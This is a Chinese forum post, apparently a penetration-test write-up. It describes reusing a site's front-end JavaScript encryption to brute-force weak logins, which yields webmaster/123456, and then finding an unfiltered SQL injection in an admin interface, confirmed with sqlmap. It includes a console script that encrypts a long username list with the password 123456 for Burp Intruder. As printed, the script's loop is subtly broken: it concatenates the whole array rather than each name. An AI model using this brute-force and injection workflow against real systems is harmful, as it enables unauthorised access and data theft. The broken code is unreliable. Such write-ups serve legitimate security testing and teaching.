|
前端js中往往存有前后端交互时候的加密方法,稍加利用就能达到对加密密码进行爆破的目的。本文中的案例就是这样展开的,从加解密方法泄露到弱口令进入后台,最后再后台SQL注入获取权限首先测试系统遇到经典登录框 输入用户名密码,点击登录以后会抓到一个如下登录数据包: 请求路径为/log_in,传参为加密的param param参数明显加密了,但是加解密方法写在前端js当中观察网站系统加载的js,在loginbar.js中,写明了参数加密的方法是xs_strEnccs参数格为:'username='+username+'&password='+password+'&rootsrc=3'[color=rgba(0, 0, 0, 0.9)]追踪方法,发现xs_strEnccs又调用了strEnc方法,而解密参数的方法名称为xs_strDec [color=rgba(0, 0, 0, 0.9)]点击忘记密码跳转到其他页面,观察js代码 [color=rgba(0, 0, 0, 0.9)]在该找回密码页面中,可以找到strEnc方法,这个方法正式对密文进行加密的子方法 [color=rgba(0, 0, 0, 0.9)]这样到这一步,完整的加密方法都理清楚了,大致步骤如下 xs_strEnccs调用了strEnc,传参为登录字符串,还有654321[color=rgba(0, 0, 0, 0.9)]登录时候也没有验证码,可以构造用户名不唯一、密码默认为123456的登录字符串来进行弱口令爆破。比如这样的: username=xxx&password=123456&rootsrc=3[color=rgba(0, 0, 0, 0.9)]为了图方便,我写了一个可以直接在浏览器控制台输出加密param的脚本,将最简单的弱口令密码本在控制台中进行加密转换为密文: const usernames = ["admin", "test", "test01", "test1", "test2", "weblogic", "ftp", "manager", "manage", "user", "guest", "administrator","account", "super", "superuser", "master", "imap", "memcached", "mongodb", "oracle", "pop3", "postgresql", "rdp","redis", "smb", "smtp", "sqlserver", "ssh", "svn", "telnet", "tomcat", "vnc", "xiaomi", "huawei", "apple", "topsec","360", "qihoo", "1688", "aliyun", "alipay", "www", "web", "webadmin", "webmaster", "anonymous", "jboss", "1", "admin1","root", "sever", "system", "develop", "developer", "developers", "development", "demo", "device", "devserver", "devsql","0", "01", "02", "03", "10", "11", "12", "13", "14", "15", "16", "17", "18", "19", "2", "20", "3", "3com", "4", "5","6", "7", "8", "9", "ILMI", "a", "zhangwei", "wangwei", "wangfang", "liwei", "lina", "zhangmin", "lijing", "wangjing","liuwei", "wangxiuying", "zhangli", "lixiuying", "wangli", "zhangjing", "zhangxiuying", "liqiang", "wangmin", "limin","wanglei", "liuyang", "wangyan", "wangyong", "lijun", "zhangyong", "lijie", "zhangjie", "zhanglei", "wangqiang", "lijuan","wangjun", "zhangyan", "zhangtao", "wangtao", "liyan", "wangchao", "liming", "liyong", "wangjuan", "liujie", "liumin", "lixia","lili", "zhangjun", "wangjie", "zhangqiang", "wangxiulan", "wanggang", "wangping", "liufang", "liuyan", "liujun", "liping","wanghui", "chenjing", "liuyong", "liling", "liguiying", "wangdan", "ligang", "lidan", "wangpeng", "liutao", "chenwei","zhanghua", "liujing", "litao", "wangguiying", "zhangxiulan", "lihong", "lichao", "liuli", "zhangguiying", "wangyulan","zhangpeng", "lixiulan", "zhangchao", "wangling", "zhangling", "lihua", "wangfei", "zhangyulan", "wangguilan", "wangying","liuqiang", "chenxiuying", "liying", "lihui", "limei", "chenyong", "wang", "lifang", "zhangguilan", "libo", "yangyong","wangxia", "liguilan", "wangbin", "lipeng", "zhangping", "zhanghui", "zhangyu", "liuju", "xujing", "yanghong", "yangziwen", "zhangshulan", "zhangwen", "chenguilan", "zhouli", "lishuhua", "chen", "machao","liujianguo", "liguihua", "wangfenglan", "lishulan", "chenxiuzhen"];for (let i = 0; i < usernames.length; i++) {const result = 'username='+usernames+'&password=123456&rootsrc=3' const result2 = xs_strEnccs(result); console.log(result2); }[color=rgba(0, 0, 0, 0.9)]调用现成的js里的加密函数进行加密,效果如下 [color=rgba(0, 0, 0, 0.9)]加密完的字典之后,将登录的数据包直接转发到burp的intruder中替换参数进行爆破 [color=rgba(0, 0, 0, 0.9)]爆破显示状态码为537时,登录成功,此时的param为 2D54C345E9883022B05FA18CDC024536EE4A58B6C5BBA9449ED0BAF1115B734923153A77E0449A6FC2CF1D90227EB5EE4D4C437553E62E12CA570C1934CE6FCC5D98631EB611684F6853A618AFAAF53267ADABEF2D9C279B[color=rgba(0, 0, 0, 0.9)]此时再在js中调用解密方法,解密弱口令如下: [color=rgba(0, 0, 0, 0.9)]webmaster/123456 [color=rgba(0, 0, 0, 0.9)]但是直接输入账号密码webmaster/123456登录会报错,还需要传个参数rootsrc=3,这应该是另一种登录方式中存在的弱口令 [color=rgba(0, 0, 0, 0.9)]所以登录时抓包,再替换数据包里面的param值,放包以后就能正常登录 [color=rgba(0, 0, 0, 0.9)]最后成功以webmaster账户登录进入后台 后台用户管理处泄露大量敏感信息[color=rgba(0, 0, 0, 0.9)]接下来就是后台漏洞挖掘了 [color=rgba(0, 0, 0, 0.9)]登录成功webmaster后,可以发现一个后台接口存在注入,这里没存截图只有个数据包,完全没有过滤的注入 参数classname存在注入,使用sqlmap进行验证数据包,后端数据库为Oracle 测试结束
|
50 个XD币
发表于 2025-4-17 10:11:37
